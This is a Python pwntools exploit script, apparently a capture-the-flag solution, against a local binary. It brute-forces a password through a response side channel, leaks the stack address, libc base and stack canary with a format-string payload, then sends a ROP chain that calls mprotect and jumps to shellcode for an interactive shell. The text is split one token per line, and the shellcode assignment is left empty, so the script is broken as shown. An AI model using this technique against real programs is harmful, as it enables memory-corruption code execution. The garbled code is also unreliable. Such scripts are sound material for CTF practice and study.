from
pwn
import
*
context(log_level
=
'debug'
,arch
=
'amd64'
)
p
=
process(
'./pwn'
)
libc
=
ELF(
'./libc.so.6'
)
ru
=
lambda
a: p.readuntil(a)
r
=
lambda
n: p.read(n)
sla
=
lambda
a,b: p.sendlineafter(a,b)
sa
=
lambda
a,b: p.sendafter(a,b)
sl
=
lambda
a: p.sendline(a)
s
=
lambda
a: p.send(a)
key
=
[
'a'
,
'a'
,
'a'
,
'a'
,
'a'
,
'a'
,
'a'
,
'a'
,
'a'
,
'a'
]
data
=
''
num
=
0
while
True
:
sla(b
'> \n'
, b
'1'
)
sa(b
'please input your password: \n'
, ''.join(key))
p.recv(
26
)
data
=
ord
(p.recv(
1
))
log.success(data)
if
(data
=
=
num
+
1
):
num
+
=
1
elif
(data
=
=
112
):
key_list
=
''.join(key)
log.success(key_list)
break
else
:
key[num]
=
chr
(
ord
(key[num])
+
1
)
sa(b
'ower!!!\n'
, b
'%10$p'
+
b
'%15$p'
+
b
'%9$p'
)
stack
=
int
(p.recv(
14
),
16
)
libcbase
=
int
(p.recv(
14
),
16
)
-
0x29d90
canary
=
int
(p.recv(
18
),
16
)
stack_base
=
int
(
str
(
hex
(stack))[
0
:
11
]
+
'000'
,
16
)
log.info(
'stack => '
+
hex
(stack))
log.info(
'libcbase => '
+
hex
(libcbase))
log.info(
'canary => '
+
hex
(canary))
log.info(
'stack_base => '
+
hex
(stack_base))
pop_rdi_ret
=
0x000000000002a3e5
+
libcbase
pop_rsi_ret
=
0x000000000002be51
+
libcbase
pop_rdx_r12_ret
=
0x000000000011f2e7
+
libcbase
mprotect
=
libc.symbols[
'mprotect'
]
+
libcbase
leave_ret
=
0x000000000004da83
+
libcbase
shellcode
=
payload
=
b
'a'
*
0x38
+
p64(canary)
+
p64(stack)
+
p64(pop_rdi_ret)
+
p64(stack_base)
payload
+
=
p64(pop_rsi_ret)
+
p64(
0x20000
)
+
p64(pop_rdx_r12_ret)
+
p64(
7
)
+
p64(
0
)
payload
+
=
p64(mprotect)
+
p64(stack
+
0x30
)
+
asm(shellcode)
sla(b
'> \n'
, b
'2'
)
sa(b
'dragon!!\n'
, payload)
p.interactive()